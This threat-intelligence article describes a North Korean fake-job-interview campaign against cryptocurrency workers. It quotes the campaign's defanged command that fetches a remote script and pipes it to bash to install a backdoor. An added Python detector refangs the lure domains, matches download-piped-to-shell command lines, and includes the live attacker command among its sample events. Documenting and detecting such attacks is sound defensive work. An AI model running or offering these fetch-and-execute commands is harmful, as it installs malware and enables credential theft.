North Korean Threat Actors Reveal Their Tactics in Replacing Infrastructure With New Assets

In the past year, there has been a notable increase in activity by North Korean threat actors targeting professionals within the cryptocurrency sector. Utilizing advanced social engineering techniques, these actors have launched a campaign termed Contagious Interview.

Campaign Overview

The campaign employs a deceptive job application process to deliver malware. Victims are invited to participate in assessments for positions at nonexistent firms, leading them to execute malicious scripts unknowingly.

To maintain operations, the attackers rapidly replace compromised domains and servers, ensuring sustained engagement and evasion of takedown efforts.

Infrastructure Replacement

Since early 2025, domains such as skillquestions[.]com and talentcheck[.]pro have been registered to create lure websites. These sites prompt candidates to execute shell commands, escalating to full system compromise by downloading malware that exfiltrates credentials.

The operators appear to monitor threat intelligence platforms continuously to learn when their own infrastructure has been exposed, and they respond by deploying new servers rather than modifying existing assets.

Infection Mechanism

The infection process is initiated when targets visit a lure site and encounter a JavaScript-powered form simulating a coding assessment. Upon triggering a fabricated error, a terminal command is displayed:

curl -s https[:]//api[.]drive-release[.]cloud/update[.]sh | bash

Executing this command downloads a shell script that installs a backdoor, ensures persistence, and communicates with a command-and-control server to register the compromised host. Detailed victimology records are logged by the ContagiousDrop Node[.]js application.
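The download-piped-to-shell one-liner shown above is a pattern that endpoint process telemetry can catch. The following detector is an added example, not code from the article or from any vendor: it assumes a constructed `host|parent|cmdline` event format, the sample events and the second and fourth URLs are constructed, and the known-host list is refanged from the indicators quoted in this article.

```python
import re
from urllib.parse import urlparse

# Defanged indicators as published in the article; refang() makes them matchable.
DEFANGED_HOSTS = ["api[.]drive-release[.]cloud", "skillquestions[.]com", "talentcheck[.]pro"]

def refang(ioc: str) -> str:
    """Undo common defanging conventions: [.] -> . , [:] -> : , hxxp -> http."""
    return ioc.replace("[.]", ".").replace("[:]", ":").replace("hxxp", "http")

KNOWN_HOSTS = {refang(h).lower() for h in DEFANGED_HOSTS}

# A downloader (curl/wget) whose stdout is piped straight into a shell interpreter.
DOWNLOAD_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|;&]*?\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")
URL_RE = re.compile(r"https?://[^\s'\"|;&]+")

# Constructed process-creation events (hypothetical telemetry format: host|parent|cmdline).
SAMPLE_EVENTS = """\
dev-laptop-01|Terminal|bash -c 'curl -s https://api.drive-release.cloud/update.sh | bash'
dev-laptop-02|zsh|wget -qO- http://203.0.113.10/setup.sh | sh
dev-laptop-03|zsh|curl -s https://api.github.com/repos/foo/bar -o release.json
dev-laptop-04|Terminal|sh -c "curl -fsSL https://get.example.test/install | sudo bash -s -- --yes"
dev-laptop-05|bash|cat notes.txt | bash
"""

def classify(cmdline: str) -> dict:
    """Verdict for one command line: pipe-to-shell pattern plus known-host match."""
    hit = DOWNLOAD_TO_SHELL.search(cmdline) is not None
    hosts = [h for h in (urlparse(u).hostname for u in URL_RE.findall(cmdline)) if h]
    known = sorted(h for h in hosts if h in KNOWN_HOSTS)
    severity = "high" if known else ("medium" if hit else "none")
    return {"pipe_to_shell": hit, "hosts": hosts, "known_hosts": known, "severity": severity}

def scan(log: str) -> list[dict]:
    """Parse 'host|parent|cmdline' lines; return only events that need analyst attention."""
    findings = []
    for line in log.splitlines():
        if not line.strip():
            continue
        host, parent, cmdline = line.split("|", 2)  # cmdline may itself contain '|'
        verdict = classify(cmdline)
        if verdict["severity"] != "none":
            findings.append({"host": host, "parent": parent, **verdict})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["severity"], f["host"], f["hosts"])
```

A plain `curl -o file` or a local `cat file | bash` is left alone; a known lure host raises the verdict to high even when the pipe pattern is obfuscated away.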

Impact and Response

These tactics highlight the advanced capabilities of North Korean threat actors and show that the threat is persistent. Understanding the infection mechanism is crucial for disrupting the attack chain, and enhanced detection protocols are necessary to protect targeted industries from these evolving threats.